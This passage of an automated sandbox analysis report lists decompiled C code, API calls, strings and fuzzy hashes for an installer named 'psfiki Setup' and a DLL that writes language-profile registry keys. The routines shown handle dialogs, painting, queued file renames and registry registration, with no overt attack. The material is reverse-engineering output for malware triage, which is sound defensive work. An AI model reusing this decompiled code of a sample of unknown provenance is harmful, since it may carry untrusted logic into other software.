                                          0x00403923
                                          0x00000000
                                          0x00000000
                                          0x00403925
                                          0x00403911
                                          0x00403911
                                          0x00403913
                                          0x00403913
                                          0x00000000
                                          0x00403913
                                          0x00403906
                                          0x0040390b
                                          0x00000000
                                          0x0040390b
                                          0x004038ea
                                          0x004038f0
                                          0x00000000
                                          0x00000000
                                          0x004038f2
                                          0x00000000
                                          0x004038f2
                                          0x004038e2
                                          0x00000000
                                          0x004038e2
                                          0x004038c8
                                          0x004038cf
                                          0x004038d5
                                          0x004038d7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004038d7
                                          0x00403893
                                          0x00000000
                                          0x00403871
                                          0x00403877
                                          0x00403881
                                          0x00403c87
                                          0x00403c8d
                                          0x00403c8f
                                          0x00403c95
                                          0x00403c9a
                                          0x00403ca0
                                          0x00403ca0
                                          0x00403c95
                                          0x00403caa
                                          0x00000000
                                          0x00403caa
                                          0x0040386f

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                          • ShowWindow.USER32(?), ref: 00403863
                                          • DestroyWindow.USER32 ref: 00403877
                                          • SetWindowLongA.USER32 ref: 00403893
                                          • GetDlgItem.USER32(?,?), ref: 004038B4
                                          • SendMessageA.USER32 ref: 004038C8
                                          • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                          • GetDlgItem.USER32(?,00000001), ref: 0040397D
                                          • GetDlgItem.USER32(?,00000002), ref: 00403987
                                          • SetClassLongA.USER32(?,000000F2,?), ref: 004039A1
                                          • SendMessageA.USER32 ref: 004039F2
                                          • GetDlgItem.USER32(?,00000003), ref: 00403A98
                                          • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                          • EnableWindow.USER32(?,?), ref: 00403ACB
                                          • EnableWindow.USER32(?,?), ref: 00403AE6
                                          • GetSystemMenu.USER32 ref: 00403AFC
                                          • EnableMenuItem.USER32 ref: 00403B03
                                          • SendMessageA.USER32 ref: 00403B1B
                                          • SendMessageA.USER32 ref: 00403B2E
                                          • lstrlenA.KERNEL32(00429FD8,?,00429FD8,psfiki Setup), ref: 00403B57
                                          • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                          • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID: psfiki Setup
                                          • API String ID: 184305955-2728070757
                                          • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                          • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                          • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                          • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403E25, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fb8 =  *0x429fb8 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403D44(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297a8 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004040B0();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e33c; // 0x294de4
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42eb98; // 0x2939c0
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403DF1;
				E00403CDD(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403CDD(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403D12(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42eb70; // 0x2903c0
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428f9c =  *0x428f9c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fb8 =  *0x429fb8 & 0x00000000;
				return 0;
			}




















                                          0x00403e35
                                          0x00403f5b
                                          0x00403fb7
                                          0x00403fbb
                                          0x00404092
                                          0x00404094
                                          0x00404094
                                          0x0040409a
                                          0x0040409a
                                          0x0040409d
                                          0x00000000
                                          0x004040a4
                                          0x00403fc9
                                          0x00403fcb
                                          0x00403fd5
                                          0x00403fe0
                                          0x00403fe3
                                          0x00403fe6
                                          0x00403ff1
                                          0x00403ff4
                                          0x00403ffb
                                          0x00404009
                                          0x00404021
                                          0x00404034
                                          0x00404044
                                          0x00404046
                                          0x00404046
                                          0x00403ffb
                                          0x00404050
                                          0x00000000
                                          0x0040405b
                                          0x0040405f
                                          0x00404070
                                          0x00404070
                                          0x00404076
                                          0x00404084
                                          0x00404084
                                          0x00000000
                                          0x00404088
                                          0x00404050
                                          0x00403f66
                                          0x00000000
                                          0x00403f7a
                                          0x00403f80
                                          0x00403f86
                                          0x00000000
                                          0x00000000
                                          0x00403fab
                                          0x00403fad
                                          0x00403fb2
                                          0x00000000
                                          0x00403fb2
                                          0x00403f66
                                          0x00403e3b
                                          0x00403e3e
                                          0x00403e43
                                          0x00403e45
                                          0x00403e54
                                          0x00403e54
                                          0x00403e56
                                          0x00403e5b
                                          0x00403e5e
                                          0x00403e60
                                          0x00403e65
                                          0x00403e6e
                                          0x00403e74
                                          0x00403e80
                                          0x00403e83
                                          0x00403e8c
                                          0x00403e91
                                          0x00403e94
                                          0x00403e99
                                          0x00403eb0
                                          0x00403eb7
                                          0x00403eca
                                          0x00403ecd
                                          0x00403ee2
                                          0x00403ee4
                                          0x00403ee9
                                          0x00403eee
                                          0x00403ef3
                                          0x00403ef3
                                          0x00403f02
                                          0x00403f11
                                          0x00403f13
                                          0x00403f29
                                          0x00403f38
                                          0x00403f3a
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                          • String ID: N$hnahgvbse$open$M)
                                          • API String ID: 3615053054-3657911301
                                          • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                          • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                          • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                          • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001850, Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 176registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100018CF
                                          • RegOpenKeyExW.ADVAPI32 ref: 10001919
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10001937
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000198F
                                          • RegSetValueExW.ADVAPI32 ref: 100019C0
                                          • RegSetValueExW.ADVAPI32 ref: 100019DD
                                          • RegSetValueExW.ADVAPI32 ref: 100019F6
                                          • RegSetValueExW.ADVAPI32 ref: 10001A15
                                          • RegCloseKey.ADVAPI32(?), ref: 10001A1F
                                          • RegCloseKey.ADVAPI32(?), ref: 10001A3E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Value$CloseFromString$CreateOpen
                                          • String ID: %s\%s$%s\0x%08x\%s$(%p) %s %x %s %s %s %i$Description$Enable$IconFile$IconIndex$LanguageProfile
                                          • API String ID: 4095516225-583810935
                                          • Opcode ID: 95976a421422a20a8cc6552d434b7bb570f3f0fe06f6745a94ba95c66ca77696
                                          • Instruction ID: f5b3e520962a4341d797bc7b62084b8a20064c24fd2a0bb7a6012bcb4da69b6a
                                          • Opcode Fuzzy Hash: 95976a421422a20a8cc6552d434b7bb570f3f0fe06f6745a94ba95c66ca77696
                                          • Instruction Fuzzy Hash: A6511CB6A10208BBEB14DF94DD85FEF73B9EB48744F008508F709A6185D774EA84CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70; // 0x2903c0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "psfiki Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eb68; // 0x402f0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                          0x0040100a
                                          0x00401039
                                          0x00401047
                                          0x0040104d
                                          0x00401051
                                          0x0040105b
                                          0x00401061
                                          0x00401064
                                          0x004010f3
                                          0x00401089
                                          0x0040108c
                                          0x004010a6
                                          0x004010bd
                                          0x004010cc
                                          0x004010cf
                                          0x004010d5
                                          0x004010d9
                                          0x004010e4
                                          0x004010ed
                                          0x004010ef
                                          0x004010ef
                                          0x00401100
                                          0x00401105
                                          0x0040110d
                                          0x00401110
                                          0x00401112
                                          0x00401118
                                          0x0040111f
                                          0x00401126
                                          0x00401130
                                          0x00401142
                                          0x00401156
                                          0x00401160
                                          0x00401165
                                          0x00401165
                                          0x00401110
                                          0x0040116e
                                          0x00000000
                                          0x00401178
                                          0x00401010
                                          0x00401013
                                          0x00401015
                                          0x00401019
                                          0x0040101f
                                          0x0040101f
                                          0x00000000

                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,psfiki Setup,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F$psfiki Setup
                                          • API String ID: 941294808-3259575529
                                          • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                          • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                          • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                          • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001AD0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 115registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001B39
                                          • RegOpenKeyExW.ADVAPI32 ref: 10001B8D
                                          • RegQueryValueExW.ADVAPI32(?,Default,00000000,00000000,?,0000004E), ref: 10001BBD
                                          • RegCloseKey.ADVAPI32(?), ref: 10001BD0
                                          • CLSIDFromString.OLE32(?,00000000), ref: 10001BE5
                                          • RegQueryValueExW.ADVAPI32(?,Profile,00000000,00000000,?,0000004E), ref: 10001C00
                                          • CLSIDFromString.OLE32(?,00000000), ref: 10001C17
                                          • RegCloseKey.ADVAPI32(?), ref: 10001C21
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FromString$CloseQueryValue$Open
                                          • String ID: %p) %x %s %p %p$%s\%s\0x%08x\%s$Assemblies$Default$N$Profile
                                          • API String ID: 1689171533-1912333115
                                          • Opcode ID: 7596cd7ef67e1eec43bd0e5abd0cf82f37af6f28dd64996ae9a01d78d5ebc5b1
                                          • Instruction ID: 3a2f49f4a4d5d31c2d692a5181de3d78ea64db33be0623e4c54ab0343e307f6c
                                          • Opcode Fuzzy Hash: 7596cd7ef67e1eec43bd0e5abd0cf82f37af6f28dd64996ae9a01d78d5ebc5b1
                                          • Instruction Fuzzy Hash: 23416FB5900218FBEB11DF90DC89FEF73B9EB48344F108519F6059A145E775EA84CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405679, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00405679() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405C49(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c168 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
						_t18 =  *0x42eb70; // 0x2903c0
						_t56 = _t55 + 0x10;
						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405577(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405577(_t26 + 0xa, 0x409328);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E0040592B(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405602(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                          0x0040567f
                                          0x00405686
                                          0x0040568a
                                          0x00405693
                                          0x00405697
                                          0x004057d6
                                          0x004057d6
                                          0x00000000
                                          0x004057d6
                                          0x00405697
                                          0x004056a3
                                          0x004056b9
                                          0x004056e1
                                          0x004056ec
                                          0x004056f0
                                          0x00405710
                                          0x00405712
                                          0x00405717
                                          0x00405721
                                          0x0040572e
                                          0x00405733
                                          0x00405738
                                          0x0040573c
                                          0x00000000
                                          0x00000000
                                          0x0040574b
                                          0x0040574d
                                          0x0040575a
                                          0x0040575e
                                          0x004057cf
                                          0x004057d0
                                          0x00000000
                                          0x0040577a
                                          0x00405787
                                          0x004057ec
                                          0x004057f3
                                          0x0040579a
                                          0x0040579a
                                          0x0040579c
                                          0x004057a5
                                          0x004057b0
                                          0x004057c2
                                          0x004057c9
                                          0x00000000
                                          0x004057c9
                                          0x004057f5
                                          0x004057f6
                                          0x004057fb
                                          0x004057fd
                                          0x0040580a
                                          0x0040580a
                                          0x0040580e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004057ff
                                          0x004057ff
                                          0x00405802
                                          0x00405805
                                          0x00405806
                                          0x00000000
                                          0x004057ff
                                          0x00405792
                                          0x00405797
                                          0x00000000
                                          0x00405797
                                          0x0040575e
                                          0x004056bb
                                          0x004056c6
                                          0x004056cf
                                          0x004056d3
                                          0x00000000
                                          0x00000000
                                          0x004056d3
                                          0x004057e0

                                          APIs
                                            • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                            • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?), ref: 00405C66
                                            • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          • CloseHandle.KERNEL32(00000000), ref: 004056C6
                                          • GetShortPathNameA.KERNEL32 ref: 004056CF
                                          • GetShortPathNameA.KERNEL32 ref: 004056EC
                                          • wsprintfA.USER32 ref: 0040570A
                                          • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040576A
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004057C2
                                          • GlobalFree.KERNEL32(00000000), ref: 004057C9
                                          • CloseHandle.KERNEL32(00000000), ref: 004057D0
                                            • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                            • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                          • String ID: %s=%s$[Rename]
                                          • API String ID: 3772915668-1727408572
                                          • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                          • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                          • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                          • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001C30, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 153registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10001D13
                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001D6F
                                          • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001D8A
                                          • RegSetValueExW.ADVAPI32 ref: 10001DA3
                                          • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001DB3
                                          • RegSetValueExW.ADVAPI32 ref: 10001DCC
                                          • RegCloseKey.ADVAPI32(?), ref: 10001DD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FromString$Value$CloseCreate
                                          • String ID: %p) %x %s %s$%s\%s\0x%08x\%s$Assemblies$Default$Profile
                                          • API String ID: 1318437696-2502594939
